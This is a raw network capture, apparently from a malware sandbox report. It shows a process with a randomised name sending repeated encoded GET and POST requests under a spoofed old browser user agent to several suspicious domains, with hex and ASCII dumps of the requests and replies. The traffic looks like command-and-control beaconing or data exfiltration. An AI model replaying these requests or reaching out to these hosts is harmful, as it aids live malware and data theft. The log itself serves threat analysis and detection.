                                                                                          Data Ascii: gHCXmDU=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3r+auLduoj2pzwZDRl7a5qDFis5WJSGdAWCGrp8xHksCpuJgE3sob4hVy8yqwMtE56IyV2wmipQvpSRag/qziSsE2FLl0aM2XulKOHOWcAPT9SRrnS5VhyTeVGJthPvs5yyM+v2tEKlnVio5BC6YRxwoqZ1vPCEQE/u76HR6koGfni1nSax8g7m9M5xi+bCMBd/LyMr/ZolGrn0uBIVDnz9cx6E0x7UiGgTPo3QhQx4GBNWChwMHzchuoc8qZB9ierQKK9JOjY86dcar5wuT+p9XUeWTHEJxolR5bFQyWqWjutxA7LlVDdcsIMhb7XvJhRgsn21UBqtHYo8mYVoPoL6Zq4W8ZWthlkgg70K+NcnvYlUYbnnfOCW0sPAlq2TfALeeyacAa9H0yjmUuNSMpl5+MBy951MM72PwzpwwdHJZyhQxv9ThLLmelm6EJjWrKP44tnFAqf2ZThMMJLAhKoXbHdln6Vn/d3JYgKG/IoP8ryvXdCiRGqu74qrVIr63jt68/YFqfLThOr7M/ojIgw1Cu1WiB26ClRJ1NQomHnhXx0IPYJkYgRgmxOtkDSx3iF3cJtB47NV5iMm7JlJ9P/lIX4k9q80WqEdKQzk4gFcmwrzO9a6fNIwDeco/kP46fe1E4OobUPJPzzIxSPXTm1V7dilB+V4KlPqtAD/QeVzOEHSeMLMInTuumwKtdYFv3gwxH7LuMN+y1mriBpv9scmpfJwatdBfg1KXaDQ6gOaqqos6pmQMR05e8N+1W1SrxITWRuGQk6GPkNfadkSy42gkiXVXSTMGALTRQaX+Ot+mEIABWU7NChV3wsNEk8LzfOOKrB/iTdHalGsS9bUpm5UsG35v5bYy46uGqs+MiDC4EH/PGN1nSpFoCaDUb4SxPRyercVmnzUMg6HZ3yYDiVSILKX4o/zUy0/QZH6vCQsIi79OKGI7ZAxskGk0jZ6ODoPI [TRUNCATED]
                                                                                          Sep 30, 2024 18:46:18.148269892 CEST980INHTTP/1.1 404 Not Found
                                                                                          Date: Mon, 30 Sep 2024 16:46:17 GMT
                                                                                          Server: Apache
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Content-Length: 774
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.549740199.192.21.169801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:20.004842043 CEST545OUTGET /ghvt/?gHCXmDU=LTjEQRzJtYpWLPC7D2gy6fienZfrxvC35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4hrVkAG0NSKhN96qT0ct2vaZlIyhDhNk8pUo7hoK/rit8rQ==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.technectar.top
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:20.598527908 CEST995INHTTP/1.1 404 Not Found
                                                                                          Date: Mon, 30 Sep 2024 16:46:20 GMT
                                                                                          Server: Apache
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Content-Length: 774
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.5497413.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:25.713385105 CEST809OUTPOST /l8vr/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.linkwave.cloud
                                                                                          Origin: http://www.linkwave.cloud
                                                                                          Referer: http://www.linkwave.cloud/l8vr/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 49 56 52 54 38 54 47 4a 46 42 75 71 72 34 45 4a 38 78 2f 35 42 4b 4f 61 59 39 43 70 6f 62 53 77 39 46 6b 50 44 66 42 4e 4b 73 5a 42 6d 30 48 7a 46 74 4e 75 58 66 36 4d 46 46 44 75 4b 41 4b 41 6f 73 4c 45 4b 57 4d 58 73 43 54 47 51 30 39 69 4d 48 50 4e 53 37 59 2b 68 6b 66 70 42 50 75 74 53 47 76 69 47 77 4f 53 56 32 69 46 51 79 61 66 6b 72 30 37 77 71 65 71 42 6d 47 63 44 62 68 55 59 65 4c 70 75 74 33 31 73 74 53 72 34 79 6e 61 64 37 6a 63 37 63 67 45 6e 63 34 4d 4a 6d 7a 77 51 6d 63 44 6b 64 34 38 47 51 4b 33 38 2b 36 77 74 51 6d 63 54 47 55 64 67 45 3d
                                                                                          Data Ascii: gHCXmDU=LWY65CcvY07FWIVRT8TGJFBuqr4EJ8x/5BKOaY9CpobSw9FkPDfBNKsZBm0HzFtNuXf6MFFDuKAKAosLEKWMXsCTGQ09iMHPNS7Y+hkfpBPutSGviGwOSV2iFQyafkr07wqeqBmGcDbhUYeLput31stSr4ynad7jc7cgEnc4MJmzwQmcDkd48GQK38+6wtQmcTGUdgE=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.5497423.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:28.368000984 CEST829OUTPOST /l8vr/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.linkwave.cloud
                                                                                          Origin: http://www.linkwave.cloud
                                                                                          Referer: http://www.linkwave.cloud/l8vr/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 4c 53 31 6f 35 6b 64 79 66 42 4d 4b 73 5a 4a 47 30 43 33 46 74 38 75 58 62 79 4d 48 52 44 75 4f 67 4b 41 71 30 4c 45 39 4b 4e 57 38 43 52 66 41 30 2f 2f 63 48 50 4e 53 37 59 2b 68 78 43 70 46 72 75 74 47 43 76 67 6a 51 52 62 31 32 68 45 51 79 61 62 6b 72 6f 37 77 71 38 71 44 53 6f 63 41 6a 68 55 64 69 4c 70 2f 74 6f 37 73 74 55 31 34 7a 77 53 66 57 71 61 74 45 69 44 58 64 4d 58 59 6d 77 78 6d 4c 32 5a 47 56 51 76 6d 38 79 6e 76 32 4e 68 64 78 50 47 77 57 6b 44 33 51 65 66 64 47 64 75 4d 67 36 4e 44 47 66 32 52 64 32 6d 2b 57 6a
                                                                                          Data Ascii: gHCXmDU=LWY65CcvY07FWolRf/LGBFBp274EGcx75BGOaZ4PpeLS1o5kdyfBMKsZJG0C3Ft8uXbyMHRDuOgKAq0LE9KNW8CRfA0//cHPNS7Y+hxCpFrutGCvgjQRb12hEQyabkro7wq8qDSocAjhUdiLp/to7stU14zwSfWqatEiDXdMXYmwxmL2ZGVQvm8ynv2NhdxPGwWkD3QefdGduMg6NDGf2Rd2m+Wj


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.5497433.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:31.459141970 CEST1846OUTPOST /l8vr/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.linkwave.cloud
                                                                                          Origin: http://www.linkwave.cloud
                                                                                          Referer: http://www.linkwave.cloud/l8vr/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 44 53 70 4b 68 6b 50 68 48 42 50 4b 73 5a 56 57 30 44 33 46 74 62 75 57 2f 2b 4d 48 63 34 75 49 73 4b 47 2f 67 4c 4e 6f 2b 4e 63 38 43 52 51 67 30 2b 69 4d 47 46 4e 53 72 63 2b 68 68 43 70 46 72 75 74 41 75 76 70 57 77 52 64 31 32 69 46 51 79 73 66 6b 72 4d 37 77 79 47 71 44 57 57 64 78 44 68 56 35 2b 4c 76 4e 46 6f 6b 38 74 57 68 59 7a 34 53 66 61 70 61 70 73 49 44 55 42 69 58 66 53 77 78 6e 32 51 4d 48 74 6d 38 46 55 77 71 76 36 61 2f 59 41 74 46 6d 72 56 4a 67 30 51 63 75 32 6f 6e 34 5a 69 4c 69 58 74 31 33 6c 64 75 62 33 52 69 4d 71 51 75 4d 77 2b 6f 4c 4c 4d 31 51 48 68 59 31 2b 32 54 69 57 64 57 49 76 62 34 53 67 70 6c 6f 6a 2f 43 61 72 72 75 7a 4c 67 4a 74 78 64 34 77 70 4d 66 61 64 66 37 77 6f 42 53 42 6b 42 47 48 6a 50 69 48 58 31 47 37 36 64 4b 41 6f 49 47 51 70 78 57 59 4f 64 45 52 63 73 35 44 73 6f 31 4f 73 45 33 31 52 4a 54 39 30 54 6b 73 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=LWY65CcvY07FWolRf/LGBFBp274EGcx75BGOaZ4PpeDSpKhkPhHBPKsZVW0D3FtbuW/+MHc4uIsKG/gLNo+Nc8CRQg0+iMGFNSrc+hhCpFrutAuvpWwRd12iFQysfkrM7wyGqDWWdxDhV5+LvNFok8tWhYz4SfapapsIDUBiXfSwxn2QMHtm8FUwqv6a/YAtFmrVJg0Qcu2on4ZiLiXt13ldub3RiMqQuMw+oLLM1QHhY1+2TiWdWIvb4Sgploj/CarruzLgJtxd4wpMfadf7woBSBkBGHjPiHX1G76dKAoIGQpxWYOdERcs5Dso1OsE31RJT90TksaJR9QB2z9icFxqs7kysUR6rt8hLmjl/rnDML2FU3D5vJsUH5rsucdRoRjrOGj9lqK6kDj84blaWm3Mcmu3Mbq787AhBmiqPThak2IllMNlRh/rVKFVHKuD9wkISDlen+Iv4spmSby9rlz2m9tMAzZ1r0JCVlmW/nKS7+6To2dQqFeZiQvDv1TdYph2cengVy5czRT1IDoOuKQbvjbhRKNXAUCL6gpMRKd3+NUShtGqh0Ert9/0zSBtHC4Lxu0BaFrKagLe4//sONhF9pOb5GbZbdK3NKLqM6mBkAY0WNMf5vZq04Hujo6FhlwbkuRyTi27rcIn9c4ModP3NGvo1mmKUSww5SErK2piDfZuOKskyyLq7k+C5hLV5c8CSYdpHVjVD2P1IXlHdHyl/UFjlMoMKd6ZKfAhyOhL9G1LMPGzdZl7rnz0j0SPal8VuPCR6Iw5hNjcynGBPIMCJaxo9917obUiDuU+KeBayV5pb6jNgGaiMHfjQiaiSGLhpdDeeVYKTI4Q+rrAjhS+vVwignskAQT9PBvxcYtwG0hbhROh+pQixVwLV7xAzARDYdywyc0PwHMrTgCrtIREbD/s6Xcv8IhsgO35iBYRXJGIrJDVhDKxPD/AwVlIj+h69sch1BG9vELLrZoJH8ZzxoLz1PjQ1eW3BmizxFTU [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.5497443.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:34.023124933 CEST545OUTGET /l8vr/?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.linkwave.cloud
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:34.481323957 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:46:34 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 47 55 77 61 36 30 38 4c 53 7a 6d 38 66 59 74 63 64 65 54 52 47 79 4e 79 6a 35 31 6e 42 75 55 70 30 30 75 6d 62 59 52 43 6d 2f 54 4a 6a 4a 78 70 53 54 44 4d 4f 4e 6b 71 4e 6d 73 48 6a 6e 5a 6a 6b 58 4b 71 46 6e 63 6a 71 4a 49 75 65 71 4d 76 46 61 76 6c 58 49 61 50 65 52 6b 44 37 74 33 6b 50 78 62 5a 31 53 70 58 35 47 43 62 77 32 33 68 6c 6e 59 6c 4a 30 6a 34 4a 78 71 45 54 46 71 36 70 77 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.549745188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:39.529092073 CEST821OUTPOST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 55 4b 4d 66 43 46 51 43 71 4c 4d 55 4d 74 4a 6c 58 6e 48 46 33 65 30 4d 6d 70 64 75 2f 6e 72 4a 79 5a 57 46 52 6a 43 36 4a 71 6e 57 44 46 59 49 6d 69 41 52 48 41 4f 51 43 58 33 5a 59 5a 58 58 4a 67 44 67 63 78 41 6b 45 4e 6d 6f 70 36 69 53 69 65 4d 59 75 65 41 31 68 47 39 30 38 30 73 69 4e 76 58 54 31 51 7a 41 72 35 46 64 2b 73 77 2f 2b 4d 70 67 46 30 42 75 49 71 6c 53 43 49 4f 73 41 6e 61 51 50 61 43 70 2b 65 76 47 65 63 65 48 32 4c 64 59 7a 4c 49 6a 39 36 62 46 4b 39 45 56 47 61 57 61 2f 79 66 76 71 59 54 2f 30 47 4f 54 67 4b 4e 55 70 45 46 79 67 45 3d
                                                                                          Data Ascii: gHCXmDU=gNfEDUvgPryzVUKMfCFQCqLMUMtJlXnHF3e0Mmpdu/nrJyZWFRjC6JqnWDFYImiARHAOQCX3ZYZXXJgDgcxAkENmop6iSieMYueA1hG9080siNvXT1QzAr5Fd+sw/+MpgF0BuIqlSCIOsAnaQPaCp+evGeceH2LdYzLIj96bFK9EVGaWa/yfvqYT/0GOTgKNUpEFygE=
                                                                                          Sep 30, 2024 18:46:40.039232969 CEST830INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:39 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:39 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aihwm3lqS7zWyNIzJ%2FkrOaElLwtSRr5LQnB%2Bysc7qgYpc3FRK8rlW0E%2FmM%2FEd6fRJN2hnzijzU2f5ADtO4Wi4TuQs3WQFIAS4FHsk8MJm0E%2FeaZcV5cre2b8Lt%2F8DHDp9fAG29SgfzUx"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0bb8ef8422e-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.549746188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:42.069973946 CEST841OUTPOST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 44 72 4b 57 56 57 45 51 6a 43 32 70 71 6e 4f 7a 46 42 46 47 6a 43 52 48 45 77 51 44 72 33 5a 59 64 58 58 4c 34 44 68 72 74 42 6b 55 4e 6b 75 70 36 67 64 43 65 4d 59 75 65 41 31 68 53 44 30 38 63 73 69 35 72 58 54 57 49 79 4f 4c 35 45 61 2b 73 77 75 4f 4d 74 67 46 30 2f 75 4a 33 49 53 41 77 4f 73 41 58 61 51 2b 61 42 79 75 65 74 49 2b 64 75 48 56 36 56 5a 46 48 49 2b 63 61 65 62 37 5a 69 5a 51 33 38 41 64 36 33 38 4b 30 72 76 6e 4f 35 43 51 72 6b 4f 4b 55 31 73 33 54 57 65 52 61 6e 35 6b 71 39 6f 69 77 79 5a 34 4a 38 51 78 62 32
                                                                                          Data Ascii: gHCXmDU=gNfEDUvgPryzV0aMelxQEKLPRMtJv3nDF3a0MnsYvNDrKWVWEQjC2pqnOzFBFGjCRHEwQDr3ZYdXXL4DhrtBkUNkup6gdCeMYueA1hSD08csi5rXTWIyOL5Ea+swuOMtgF0/uJ3ISAwOsAXaQ+aByuetI+duHV6VZFHI+caeb7ZiZQ38Ad638K0rvnO5CQrkOKU1s3TWeRan5kq9oiwyZ4J8Qxb2
                                                                                          Sep 30, 2024 18:46:42.538909912 CEST822INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:42 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:42 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
